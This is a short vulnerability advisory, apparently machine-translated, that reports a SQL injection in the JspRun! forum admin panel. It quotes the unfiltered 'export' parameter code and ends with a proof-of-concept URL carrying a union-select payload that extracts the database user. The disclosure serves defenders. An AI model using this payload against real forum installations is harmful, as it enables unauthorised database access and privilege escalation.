JspRun! The forum management background injection vulnerability-vulnerability warning-the black bar safety net

2011-04-29T00:00:00
ID MYHACK58:62201130252
Type myhack58
Reporter 佚名
Modified 2011-04-29T00:00:00

Description

Vulnerability description: JspRun! The forum management background the export variable is not filtered, directly into the query statement, resulting in the background, you can operate the database, access to system privileges.

Vulnerability analysis: in processing the background documents submitted by the ForumManageAction. java the 1 9 4 0 line

String export = request. getParameter("export");//direct access, no security filtering if(export!= null){ List<Map<String,String>> styles=dataBaseService. executeQuery("SELECT s. name, s. templateid, t. name AS tplname, t. directory, t. copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t. templateid=s. templateid WHERE styleid='"+export+"'");//enter the query language, the implementation of the... if(styles==null||styles. size()==0){

Vulnerability test:

http://www.cnc.net/admincp.jsp?action=styles&export=1' and 1=2 union select 1,2,3,4,user()-- and "='